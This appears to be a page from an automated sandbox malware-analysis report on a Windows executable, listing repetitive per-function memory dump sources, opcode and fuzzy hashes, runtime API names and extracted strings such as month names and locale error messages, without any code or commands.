    • Instruction Fuzzy Hash: 94317022A0DF4680EA68FF29E450179F360FB84B94F9C0631DA4D077B5EE3CE5418760
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID: file=
    • API String ID: 2081738530-2538679502
    • Opcode ID: 1edb80342092630832c5fb6f55dc38ee63870157e5051224cf635a77ba23c09f
    • Instruction ID: fb425899c94a8e1fe21cf373ad35b314a4ac563a5240feb84069cdb1e6313580
    • Opcode Fuzzy Hash: 1edb80342092630832c5fb6f55dc38ee63870157e5051224cf635a77ba23c09f
    • Instruction Fuzzy Hash: 1E313022A09B4281EA69EF39E4511B9F360FBC4B94F8C0135DA5D077B5DE3CE5418B60
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID: file=
    • API String ID: 2081738530-2538679502
    • Opcode ID: 33106d8374ac5ed2b27119058a40f66d2b6d61b4a5e58011acfc8ac7b95ffe7c
    • Instruction ID: 6ddca9d5fc80b55e474fc30ced7f761064322c3850d47a329e6c304d30662ba4
    • Opcode Fuzzy Hash: 33106d8374ac5ed2b27119058a40f66d2b6d61b4a5e58011acfc8ac7b95ffe7c
    • Instruction Fuzzy Hash: 4E316735A49B8241EA1DBF2ED4401B9E360EB44BA0F8C0531EE1D477B5DE7DE4469360
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID: file=
    • API String ID: 2081738530-2538679502
    • Opcode ID: 124347fc8dc8633b8e6bdc87b3ed4e7ffb27c7dc6da090171d940b12125e2db1
    • Instruction ID: 1f9de90b80b78a32a1ccfdc6abc49e49fcd0397f108d76b1d2455d481eca5484
    • Opcode Fuzzy Hash: 124347fc8dc8633b8e6bdc87b3ed4e7ffb27c7dc6da090171d940b12125e2db1
    • Instruction Fuzzy Hash: 49319426A49B8692FA1DBF6DD440179E361EB84BA4F8C0131DE0D477B5DE3DE446C320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID: file=
    • API String ID: 2081738530-2538679502
    • Opcode ID: 48d9c4655d1b26753cda38297b84ee87202d2a335801f716313b61c49757966b
    • Instruction ID: 853e3d7a7a17232022b9a88f243d4fe541a6d571867466c05f0a72aa4238c824
    • Opcode Fuzzy Hash: 48d9c4655d1b26753cda38297b84ee87202d2a335801f716313b61c49757966b
    • Instruction Fuzzy Hash: 7C318526A4EB8691EE1DFB6ED440179E360EB84BA4F8C0131DE1D077B5DE7DE4428360
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID: file=
    • API String ID: 2081738530-2538679502
    • Opcode ID: 61d1ece634c315a025c50fc175d7199a4b562c3677c0d51e552b046aa0396774
    • Instruction ID: 8267b50ba7985cf195f2a113d855255d8d40f73efc618b84499d04c17ce45903
    • Opcode Fuzzy Hash: 61d1ece634c315a025c50fc175d7199a4b562c3677c0d51e552b046aa0396774
    • Instruction Fuzzy Hash: C0318F22E09B4681EA1DBB6DD4501B9E361EB84BA0F8C0171DE4D477B5DEBCE4428364
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID: file=
    • API String ID: 2081738530-2538679502
    • Opcode ID: c715b6234142cd09e9b106a8f36208cb94172bf7d7ad036fe947d961413caed5
    • Instruction ID: fce3431eec2406848326c1a80853e70bf1947ee48aeb3fbd1588a43aed448e86
    • Opcode Fuzzy Hash: c715b6234142cd09e9b106a8f36208cb94172bf7d7ad036fe947d961413caed5
    • Instruction Fuzzy Hash: 0C31B622A0AF4A84EE1DBB2DD440179E320EF95BA4F8C0131DE5D477B6DE7CE44A8364
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID: file=
    • API String ID: 2081738530-2538679502
    • Opcode ID: e364a7d37f6e9fbbd1dce1d43802610c092617238c46e8cfe554c601d2725b9b
    • Instruction ID: 37d9f81ecdc4c4afdc042da3a9933ed825a64ca4e0c1feb6251d7ca506bddfac
    • Opcode Fuzzy Hash: e364a7d37f6e9fbbd1dce1d43802610c092617238c46e8cfe554c601d2725b9b
    • Instruction Fuzzy Hash: DE316122A09F4A85EA1DBB2DD440179E361EB84BA4F8C0532DE1D477B6DF7CE446C364
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID: file=
    • API String ID: 2081738530-2538679502
    • Opcode ID: 0412f7df46e42df070327a9a1b5083ccedc36c2dba824865371200824fc3f07c
    • Instruction ID: bd4f4b16f93c2c54b5d63213b34288fee5a482ea210a5ec4dcf56cf1915d2d6f
    • Opcode Fuzzy Hash: 0412f7df46e42df070327a9a1b5083ccedc36c2dba824865371200824fc3f07c
    • Instruction Fuzzy Hash: 2C318422A4AB8692EE1DBB6ED440178E361EB84BA0F8C0131DE1D477B5DE3DE4468360
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID: file=
    • API String ID: 2081738530-2538679502
    • Opcode ID: 7c2c59fa053a96a9ecf4ebc1fe4e55a598fb33aa9990182c37703a59b10f1925
    • Instruction ID: 3ea2cef8461dc1da4ded8bb47d24340c7fd9eb614410ded1e54c47c0be2bd680
    • Opcode Fuzzy Hash: 7c2c59fa053a96a9ecf4ebc1fe4e55a598fb33aa9990182c37703a59b10f1925
    • Instruction Fuzzy Hash: F2318222A4AB8695EA0DBB6ED400179E360EF84BA0F8C0532DE5D477B5DF3DF4428320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID: file=
    • API String ID: 2081738530-2538679502
    • Opcode ID: a79b8aa47fa485bbab139914a1b2ad1b3c206d5a57251d70f73a494e315bbdf8
    • Instruction ID: 05410d8e9ecfe2900970ae7b8964833917dbb05c262b20c9d1d680d564ad15d5
    • Opcode Fuzzy Hash: a79b8aa47fa485bbab139914a1b2ad1b3c206d5a57251d70f73a494e315bbdf8
    • Instruction Fuzzy Hash: 5F318322E09B4685EA1DBB6DE840179E361EB84BA0F8C0131DE5D476F5DE7CE4428364
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: High$Low${"msg":"
    • API String ID: 3668304517-1891866251
    • Opcode ID: 4a3cfaeab38b78596b3228263cae7344cdeb35620154d9bc2cdc784de1d34b88
    • Instruction ID: be8ea8163a1e0e6dbf579903f81de720bd51456253e40033d437134b75969384
    • Opcode Fuzzy Hash: 4a3cfaeab38b78596b3228263cae7344cdeb35620154d9bc2cdc784de1d34b88
    • Instruction Fuzzy Hash: FF71D362F18B8685FB04EB79D4503BCA320EB55798F885331EE5C126EAEF78E185C350
    APIs
    Strings
    • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FF75BD16548
    • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF75BD16488
    • M:pm, xrefs: 00007FF75BD165C1
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Concurrency::cancel_current_task
    • String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday$M:pm
    • API String ID: 118556049-1862959636
    • Opcode ID: 53820c5083b1a79f781b10075a89789dd2e95327002a2535c902c75b9376703e
    • Instruction ID: cf6776084df011b922e27ffcc64d04151d0d0b32874fccdc2e145b6dfe739f12
    • Opcode Fuzzy Hash: 53820c5083b1a79f781b10075a89789dd2e95327002a2535c902c75b9376703e
    • Instruction Fuzzy Hash: 2C51B321A0AB8645FA09FF29D5443B8E790EF84B84F8D4134DE1D077E6EF2DE44187A0
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
    • String ID: bad locale name
    • API String ID: 1386471777-1405518554
    • Opcode ID: fef943b3e94fe06f291272d72be438a6e3b6cd09b7a1663201a4f2f1369eeb99
    • Instruction ID: 32d306db8670243582ec1b192dfe448558dfd8336e21d086cf568602e044add7
    • Opcode Fuzzy Hash: fef943b3e94fe06f291272d72be438a6e3b6cd09b7a1663201a4f2f1369eeb99
    • Instruction Fuzzy Hash: B5517F62B09B419AFB18EF78D4502FCB370AF84744F884135DE4D27AA6DF38A45AD364
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Value$ErrorLast
    • String ID:
    • API String ID: 2506987500-0
    • Opcode ID: f5b00e574aa0d888fdfeee6e05e8aa48410a17821f25b7e5bbad88f407bda14a
    • Instruction ID: e815439251a4a1d8ad215f1f2207ae9fa8534c84ca9c48e69089878f078a479d
    • Opcode Fuzzy Hash: f5b00e574aa0d888fdfeee6e05e8aa48410a17821f25b7e5bbad88f407bda14a
    • Instruction Fuzzy Hash: 8D214920E0D74643FA6D776E66D6179E2526F497A0F8C0734E93E0AAFADE2CA4414221
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
    • String ID: CONOUT$
    • API String ID: 3230265001-3130406586
    • Opcode ID: fa74d9c8879e8cdb95192a2adeca3752a1c4f91f799748938ef10a61cb66cab8
    • Instruction ID: f13f289458f176fa31a0d607dc40a32b23bcc2a767a74699c384b300a6589afb
    • Opcode Fuzzy Hash: fa74d9c8879e8cdb95192a2adeca3752a1c4f91f799748938ef10a61cb66cab8
    • Instruction Fuzzy Hash: 6311D321718F4186E354AB1AF854379F2A0FB88FE4F980234EA2D837A4DF3DD4048710
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ByteCharMultiStringWide
    • String ID:
    • API String ID: 2829165498-0
    • Opcode ID: 365d1809e1fc97452a50b45ad1143c2e49007afe7a5dee32fe1fa1860b5294e4
    • Instruction ID: 0eb89a756eced2cdc29cc1c46f4586cd66390de25014b9bab3749f1cdce58b93
    • Opcode Fuzzy Hash: 365d1809e1fc97452a50b45ad1143c2e49007afe7a5dee32fe1fa1860b5294e4
    • Instruction Fuzzy Hash: 1C81B532A0874186EB689F69E480379E6A1FF457A8F880235EE5D17BE4EFBCD4448710
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID:
    • API String ID: 2081738530-0
    • Opcode ID: d39c7b6fc60f21c3df8607624212dac4fb56cbd034ddefb43e8cd75d3152efc0
    • Instruction ID: 6268a38d1e867f6f191964cea451895d92981b2967702f1a16bbc7b7e96ff8cc
    • Opcode Fuzzy Hash: d39c7b6fc60f21c3df8607624212dac4fb56cbd034ddefb43e8cd75d3152efc0
    • Instruction Fuzzy Hash: 17414162A09B8681EB1DFB2AD4501B9E360EF84B94F8C0132DE5D476B5DF6DE4468360
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
